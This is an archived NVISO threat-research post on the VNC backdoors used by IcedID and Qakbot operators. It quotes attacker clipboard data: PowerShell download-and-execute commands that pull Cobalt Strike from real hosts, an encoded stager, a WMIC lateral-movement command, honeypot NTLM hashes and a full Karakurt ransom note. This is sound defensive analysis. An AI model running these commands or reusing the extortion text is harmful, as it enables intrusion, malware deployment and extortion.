{
	"id": "c5211d45-8d87-4bf0-86cd-e069f7364846",
	"created_at": "2026-04-10T03:21:13.267794Z",
	"updated_at": "2026-04-10T03:22:16.959332Z",
	"deleted_at": null,
	"sha1_hash": "6e2153d0a7c4ce6751cc64abb8efd8ab1744e555",
	"title": "IcedID \u0026 Qakbot's VNC Backdoors: Dark Cat, Anubis \u0026 Keyhole",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3633963,
	"plain_text": "IcedID \u0026 Qakbot's VNC Backdoors: Dark Cat, Anubis \u0026 Keyhole\r\nBy Maxime Thiebaut\r\nPublished: 2023-03-20 · Archived: 2026-04-10 02:40:47 UTC\r\nIcedID (a.k.a. BokBot) is a popular Trojan who first emerged in 2017 as an Emotet delivery. Originally described as a\r\nbanking Trojan, IcedID shifted its focus to embrace the extortion/ransom trend and nowadays acts as an initial access broker\r\nmostly delivered through malspam campaigns. Over the last few years, IcedID has commonly been seen delivering Cobalt\r\nStrike prior to a multitude of ransomware strains such as Conti or REvil.\r\nIcedID itself is composed of multiple modules, one of which is a poorly documented VNC backdoor (Virtual Network\r\nComputing) acting as a cross-platform remote desktop solution. Existence of this module (branded “HDESK” or “HDESK\r\nbot”) is just partially mentioned by Malwarebytes (2017) and Kaspersky (2021) while its usage has been widely observed\r\nand occasionally vulgarized as “Dark VNC”.\r\nAs part of our research efforts, NVISO has been analyzing IcedID and Qakbot’s command \u0026 control communications. In\r\nthis blog-post we will share insights into IcedID and Qakbot’s VNC backdoor(s) as seen from an attacker’s\r\nperspective, insights we obtained by extracting and reassembling VNC (RFC6143) traffic embedded within private and\r\npublic captures published by Brad Duncan.\r\nIn this post we introduce the three variants we observed as well as their capabilities: Dark Cat, Anubis and Keyhole. We’ll\r\nfollow by exposing common techniques employed by the operators before revealing information they leaked through their\r\nclipboard data.\r\nBokbot or Qakbot?\r\nThis research was originally titled “IcedID’s VNC Backdoors: Dark Cat, Anubis \u0026 Keyhole” and focused solely on IcedID\r\n(Bokbot). 
Brad however correctly pointed out that Dark Cat is only leveraged by Qakbot, samples which were mistakenly\r\nincluded in this research after being confused with Bokbot (IcedID).\r\nIcedID and Qakbot VNC traffic remains extremely similar as can be observed in the following three VNC backdoors.\r\nHDESK Variants\r\nDuring our analysis of both public and private IcedID and Qakbot network captures, we identified 3 VNC backdoor variants,\r\nall part of the HDESK strain. These backdoors are typically activated during the final initial-access stages to initiate hands-on-keyboard activity. Supposedly short for “Hidden Desktop”, HDESK leverages Windows features allowing the backdoor\r\nto create a hidden desktop environment not visible to the compromised user. Within this hidden environment, the threat\r\nactors can start leveraging the user interface to perform regular tasks such as web browsing, reading mails in Outlook or\r\nexecuting commands through the Command Prompt and PowerShell.\r\nWe believe with medium confidence that these backdoors share origins as the Dark Cat interface (used by Qakbot) has\r\ntraits that can later be found within Anubis and Keyhole interfaces (used by IcedID).\r\nThe “Dark Cat VNC” variant was first observed in November 2021 and is believed to be the named releases v1.1.2 and\r\nv1.1.3 used by Qakbot. Its usage was still extensively observed by the end of 2022. 
Upon initial access, the home screen\r\npresents the operator with multiple options to create new sessions alongside backdoor metrics such as idle time or lock state.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 1 of 11\n\nFigure 1: The Dark Cat VNC interface.\r\nUser Session\r\nThe USER session exists in three variations (read, standard and black) which allow the operator to switch the VNC\r\nview to the user’s visible desktop.\r\nHDESK Session\r\nThe HDESK session exists in three variations as well: standard, Tmp and NM (also called bot). This session type causes\r\nthe backdoor to create a new hidden desktop not visible to the compromised user.\r\nBased on the activity we observed, the HDESK sessions are (understandably) preferred by the operators.\r\nAs HDESK sessions by default do not benefit from Windows’s built-in UI, operators are presented with an alternative start-menu to launch common programs. In Dark Cat these are Chrome, Firefox, Internet Explorer, Outlook, Command Prompt,\r\nRun and the Task Manager. A Windows Shell button is also foreseen which we believe, if used, will spawn the regular\r\nWindows UI most of the users are used to. Starting with Dark Cat v1.1.3 Edge Chromium furthermore joins the list of\r\navailable software.\r\nFigure 4: The Dark Cat HDESK session interface.\r\nBesides the alternate start-menu, operators can access some settings using the top-left orange icon which includes:\r\nDefining the hidden windows’ sizes.\r\nDefining the Chrome profile to use (lite or not).\r\nDeleting the browser’s profile(s).\r\nKilling the child process(es).\r\nFigure 5: The Dark Cat HDESK settings interface.\r\nWebCam Session\r\nThe WebCam sessions exist in three variations. 
While we were unable to capture its usage (honeypots lack webcams and\r\noperators do not attempt to use this session kind), its presence suggests IcedID’s VNC backdoors are capable of capturing\r\ncompromised devices’ webcam feeds.\r\nAnubis VNC\r\nThe “Anubis VNC” variant was first observed in January 2022 and is believed to be the named release v1.2.0 used by\r\nIcedID. Its usage was last observed in Q3 2022. No capability differences were observed between Anubis and Dark Cat\r\nv1.1.3.\r\nFigure 6: The Anubis VNC interface.\r\nKEYHOLE VNC\r\nThe “KEYHOLE VNC” variant was first observed in October 2022 and is believed to be the named releases v1.3 as well\r\nas v2.1. Its usage was observed as recently as Q1 2023.\r\nGrayscale\r\nThe first major change observed within Keyhole is its new color palette capability where operators can pick regular RGB\r\n(a.k.a. colored) or Grayscaled (a.k.a. black \u0026 white) feeds. The actual intent of this feature is unclear as, at least from a\r\nnetwork perspective, both RGB and Grayscale consume as many bytes per pixel, resulting in equal performance.\r\nFigure 7: The Keyhole color palette selector.\r\nHDESK Sessions\r\nKeyhole v1.3 provides a refreshed start-menu where icons have been updated and options renamed; the once cryptic Win\r\nShell option has been rebranded to the My Computer option.\r\nFigure 8: The Keyhole (v1.3) HDESK session interface in gray-scaled color palette.\r\nLater on, with v2.1, Keyhole renamed additional options and introduced the PowerShell and Desktop options. 
We\r\nassess with low confidence that the Desktop option only differs from the My Computer option by rendering the\r\nbackground as well, whereas the latter option was only seen generating desktop views without background image.\r\nFigure 9: The Keyhole (v2.1) HDESK session interface.\r\nModus Operandi\r\nObtaining recordings of threat actors operating is useful to understand which technical capabilities they are equipped with,\r\nbut also allows the identification of TTPs (Tactics, Techniques \u0026 Procedures) they might employ. In the following section\r\nwe will review some of the most recurring actions we observed IcedID and Qakbot operators perform through the above\r\ndescribed backdoors.\r\n🍯 Nothing confidential here…\r\nAll media published within this section were reconstructed from publicly published artifacts. As all information is public, we\r\nhave refrained from redacting otherwise sensitive details such as company names and accounts.\r\nTask Manager\r\nTo no surprise, the usage of the Task Manager to identify running software was extremely common. While hard to detect as\r\noperators did not attempt to interfere with security software, the usage of this graphical utility outlined one interesting\r\ndrawback. On multiple (non-published) occasions we observed actors identifying known security tooling based on the\r\nprocess icon whereas other icon-less tooling blended in with many of Windows’ icon-less applications.\r\nFigure 10: An Anubis operator performing interactive reconnaissance through the Task Manager.\r\nOutlook\r\nAnother quite common technique was the inspection of Outlook, most likely to identify poorly-populated honeypot\r\nnetworks. As was the case for the Task Manager, the graphical usage of Outlook by the operator is indistinguishable from\r\nregular user activity. 
From the available recordings, no attempts were made to use Outlook for further phishing/spam.\r\nFigure 11: A Dark Cat operator performing interactive reconnaissance through Outlook.\r\nFigure 12: A Dark Cat operator inspecting Outlook’s “Rules and Alerts” settings.\r\nOn one singular instance, we observed the actor expressing interest in Outlook’s rules. The backdoor session was however\r\nterminated before they undertook any actions, making it unclear whether this was part of the reconnaissance activities or\r\nwhether they were planning to set up malicious email redirection rules.\r\nWeb Browsers\r\nFrom the available browsers, Edge and Chrome were the favorites. Using these, operators commonly validated the browser’s\r\nconnectivity by accessing Amazon.\r\nDuring one intrusion, the operator went as far as attempting to access the compromised user’s Amazon payment information.\r\nThis attempt is a good reminder that beyond a user’s corporate identity, personal accounts are definitely at risk as well.\r\nFigure 13: A Dark Cat operator accessing Amazon’s “Your Payments” account page.\r\nFigure 14: A Keyhole operator inspecting Edge’s version details.\r\nOn some occasions operators accessed the edge://version URL. While this page exposes mostly useless information to\r\nattackers, the capture provides a sheer amount of uncommon flags usable for threat hunting.\r\nNoteworthy is the Profile path located within the user’s temporary directory and passed using the --user-data-dir=\r\nflag, a pattern that from our available telemetry seems quite uncommon for msedge.exe in enterprise environments. 
The\r\npattern is however occasionally used for applications such as opera_autoupdate.exe and msedgewebview2.exe.\r\nAlso worth noting is the usage of edge://settings/passwords to identify additional accounts.\r\nFigure 14: A Keyhole operator interactively inspecting Edge’s stored passwords.\r\nFigure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat\r\nsession.\r\nA final commonly observed pattern is the usage of the unsupported --no-sandbox command-line flag in Edge resulting in a\r\nnotification banner. From our available telemetry in enterprise environments, the usage of this flag for Edge is uncommon,\r\nas opposed to Electron-based applications (including Microsoft Teams and WhatsApp) which extensively use it.\r\nExplorer\r\nAnother commonly observed utility to inspect the compromised devices’ files and folders, including payloads dropped\r\nthrough other channels, is Windows Explorer. As was the case with Outlook, Explorer’s usage is indistinguishable from\r\nlegitimate use, making it a hard-to-detect technique.\r\nFigure 16: A Keyhole operator interactively using Explorer to inspect folders.\r\nCommand Prompt\r\nLast but not least, the command prompt was obviously used extensively. 
Usage of the command prompt is commonly\r\nleveraged for reconnaissance activities, including the usage of:\r\nwhoami /upn for system user discovery (T1033).\r\nipconfig for system network configuration discovery (T1016).\r\narp -a for both remote system discovery (T1018) and device identification based on the MAC address.\r\ndir for file and directory discovery (T1083) over SMB (T1021.002).\r\nnltest /dclist for the remote discovery of the domain controllers (T1018).\r\nping for network connectivity tests to remote systems (T1018).\r\nPowerShell (T1059.001) to deploy Cobalt Strike.\r\nAs opposed to the previous mostly passive TTPs, the active usage of the Command Prompt and PowerShell is often where\r\ndetection rules obtain a competing chance.\r\nFigure 17: An Anubis operator performing initial reconnaissance using the Command Prompt in an HDESK\r\nsession.\r\nClipboard Leaks\r\nAs VNC acts as a remote desktop solution, another trove of data was found within the clipboard synchronization feature. By\r\ncopy/pasting between victim and attacker machines, operators exposed some additional TTPs and information surrounding\r\ntheir operations.\r\nIn this section we will expose the most common and interesting data found within their clipboards.\r\nCobalt Strike\r\nAs expected, many variations of Cobalt Strike downloaders were observed. 
These leveraged both IPs and domain names, as\r\nwell as standard and non-standard ports such as HTTP on port 443 or HTTPS on port 8080 .\r\n1\r\n2\r\n3\r\n4\r\nIEX (( new-object net.webclient).downloadstring( 'http://89.163.251.143:80/a' ))\r\nIEX (( new-object net.webclient).downloadstring( 'http://146.0.72.85:443/waw' ))\r\nIEX (( new-object net.webclient).downloadstring( 'https://searcher.host/a80lvl' ))\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object\r\nnet.webclient).downloadstring('https://solvesalesoft.com:8080/coin'))\"\r\nIn some cases, the operators directly leveraged PowerShell shellcode stagers as shown in the following trimmed command.\r\n1 powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA...AGQAKAApADsA\r\nFor compromised accounts with sufficient access, WMIC commands were further issued to deploy Cobalt Strike on remote\r\nappliances.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 7 of 11\n\n1\r\nC:\\Windows\\System32\\wbem\\wmic.exe /node :10.6.21.140 process call create \"cmd.exe /c\r\npowershell.exe -nop -w hidden -c \" \"IEX ((new-object\r\nnet.webclient).downloadstring('https://solvesalesoft.com:8080/coin'))\" \"\"\r\nFinally, although we were unable to identify which tooling would rely on such a format, actors leaked what appears to be a\r\nnaming convention.\r\n1\r\n2\r\n3\r\nplugin_cobalt_126_8888\r\nplugin_cobalt_126_8080\r\nplugin_cobalt_126_443\r\nRundll32\r\nBesides Cobalt Strike, operators exposed a DllRegisterServer command which Unit 42 observed being used with\r\nrundll32.exe and attributed to the deployment of a VNC backdoor.\r\n1\r\nDllRegisterServer --id %id% --group %group% --ip\r\n87.120.8.190,158.69.133.70,185.106.120.99,45.14.226.195,103.124.106.154,149.3.170.201,5.181.80.103,89.41.182.242,172.83.155.186,45.\r\nNTLM Hashes\r\nAnother interesting finding was the presence of NTLM hashes within the clipboard data, exposing the compromise’s scope.\r\nIn this case, 
the impacted organization was part of a honeypot environment.\r\nDESKTOP-4GDQQL7\\admin 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\Administrator 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\bennie.mcbride 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\brenda.richardson 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY\\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4\r\nTECHHIGHWAY-DC\\saul.underwood 4081e42481a5986e9bfcb7000bbe98f4\r\nDESKTOP-4GDQQL7\\WDAGUtilityAccount 7cd5fddee0cd00dde47014fe7f52faa4\r\nTECHHIGHWAY-DC\\krbtgt a7b565c147b69380d0b35f37ce478a1c\r\nAttacker Notes\r\nWhile the above findings do not aid attribution, one operator did leak their intrusion notes. Within these notes (“[...]”\r\ntrimmed for readability) we can observe Russian annotations, commonly related to CIS-based crime groups, as well as\r\ninformation on then-ongoing breaches. A couple of days after the network traffic was taken, two non-honeypot companies\r\nmentioned within these notes were listed on the Black Basta ransomware group’s leak site.\r\n[...]\r\nHostname CTYMNGR1 =ist ne v domene\r\nHostname PCCXCNAU001 (4)-no ad/da/error\r\nHostname W10EQZAFI10027 -?ff ne prishla\r\nHostname NPD104 -24 host (7)\r\nHostname DESKTOP-3R921OV -small\r\n[...]\r\nHostname CAS-TAB0010 [...] 28m 9prosto) yshla v off/sdelal zakrep MSNDevices?\r\nHostname PC-REC-LEFT-10 --???? ? ?? ????\r\nHostname TRAINING - w craneserviceco.com 20m (???) razobral\r\n[...]\r\nHostname RM6988 msystemscompany.com 32m (??????) ?????????? ? ???? ?? ?????????? ???????? + ????????\r\n???????\r\nHostname EXIRP316151 ?????? ?? ????? ???????\r\nHostname ADMIN201 ???? ? ???\r\n[...]\r\nHostname ODSCHEDULING [...] 
12m work7---yshla v off\r\nHostname MDC1104 [...] 11m istok razobral\r\nRansom Notes\r\nAnother recovered artifact was a full ransom note where authors identified themselves as belonging to the Karakurt Team.\r\nWhile this note did not allow for the identification of its victim, it is further evidence of IcedID and Qakbot’s role within the\r\naccess broker ecosystem.\r\nOk, you are reading this - so it means that we have your attention.\r\nHere's the deal :\r\n1. We breached your internal network and took control over all of your systems.\r\n2. We analyzed and located each piece of more-or-less important files while spending weeks inside.\r\n3. We exfiltrated anything we wanted (the total size of taken data exceeds 372 GB).\r\nFAQ:\r\n- Who the hell are you?\r\n- The Karakurt Team. Pretty skilled hackers I guess.\r\n- WHY ARE YOU DOING THIS?!??\r\n- Our motivation is purely financial.\r\n- We are going to report this to law enforcement.\r\n- You surely can, but be ready that they will confiscate most of your IT infrastructure, and even if\r\nyou will later change your mind and decide to pay - they will not let you.\r\n- Who else already knows about the breach?\r\n- Only You, who received the same message the same way. Nobody else. For now.\r\n- What if I tell you that I do not care and going to ignore this incident.\r\n- That's a very bad choice. If you will not contact us in a timely manner (by 07.01.2022) we will\r\nstart notifying your employees, clients, partners, subcontractors and any other persons that should\r\nknow how you treat your own corporate secrets and theirs.\r\n- What if I will not contact you even after it?\r\n- Than we shall move forward and start contacting your business competitors and list of anonymous\r\ninside traders we deal with, to find out if they are going to pay us for your data. 
When the list of\r\nthe people who is interested in such data is formed - the closed online auction starts.\r\n- None will buy what you took! I do not believe you!\r\n- If the auction fails - we will just leak everything online, making sure that this leak goes\r\nstraight to the press. We will make sure that your business will bleed by using any power we have in\r\nour posession, both social and technical.\r\nhttps://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\r\nPage 9 of 11\n\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n- What happens if I pay?\r\n- Nothing bad will happen.\r\nWe will remove everything we took from your network and leave you be.\r\nWe will provide the confirmation that the data is deleted.\r\nWe will help you to close technical vulnerabilities you have and provide some insight on how to avoid\r\nsuch incidents if some other perpetrator is interested in you.\r\nWe will never tell anybody about it.\r\n- We understand. We are ready to move forward.\r\n- You will find the Access Code at the end of this file, you will need this one to get in contact\r\nwith us for further instructions\r\nTo contact us using this ID you should do the following :\r\n1. Download Tor browser - https://www.torproject.org and install it.\r\n2. Open link in TOR browser - https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion\r\n3. Insert Access Code 70fdca335aa3fd45a182f39b2592a5d0 inside the field on the page and click Enter.\r\n4. 
The chat window will open and we will be able to communicate through a secured channel.\r\nThis link is available via \"Tor Browser\" only!\r\nAs a gesture of goodwill, we are ready to give you another leak - it is exclusive and fresh as well.\r\nJust let us know if you are interested in cooperation.\r\nKey Takeaways\r\nWhile it may not be complex to detect IcedID or Qakbot itself (any modern EDR should detect the rundll32.exe abuse),\r\ndistinguishing which interactive actions were taken through a VNC backdoor does pose challenges. Focus is often put on\r\ncommand-based executions without considering what could otherwise be considered legitimate user processes such as web\r\nbrowsers or Outlook. Understanding how these backdoors operate improves responsive and forensic capabilities by, for\r\nexample, allowing the identification and explanation of Edge processes with unlikely or unsupported flags.\r\nThis blog post further outlined the capability of network-level visibility which, for complex or BYOD (Bring Your Own\r\nDevice) environments, may compensate for the lack of endpoint visibility. Within this spirit, we would like to outline the\r\neffectiveness of the Snort IDS rules published by Networkforensic with regards to the detection of IcedID command \u0026\r\ncontrol communications.\r\nIf you are facing challenges keeping your environment clean or need help due to a compromise, do not hesitate to reach out;\r\nNVISO can help!\r\nMaxime Thiebaut\r\nMaxime Thiebaut is a GCFA-certified researcher within NVISO Labs. He spends most of his time performing defensive\r\nresearch and responding to incidents. Previously, Maxime worked on the SANS SEC699 course. 
Besides his coding\r\ncapabilities, Maxime enjoys reverse engineering samples observed in the wild.\r\nSource: https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/"
	],
	"report_names": [
		"icedids-vnc-backdoors-dark-cat-anubis-keyhole"
	],
	"threat_actors": [],
	"ts_created_at": 1775791273,
	"ts_updated_at": 1775791336,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6e2153d0a7c4ce6751cc64abb8efd8ab1744e555.pdf",
		"text": "https://archive.orkl.eu/6e2153d0a7c4ce6751cc64abb8efd8ab1744e555.txt",
		"img": "https://archive.orkl.eu/6e2153d0a7c4ce6751cc64abb8efd8ab1744e555.jpg"
	}
}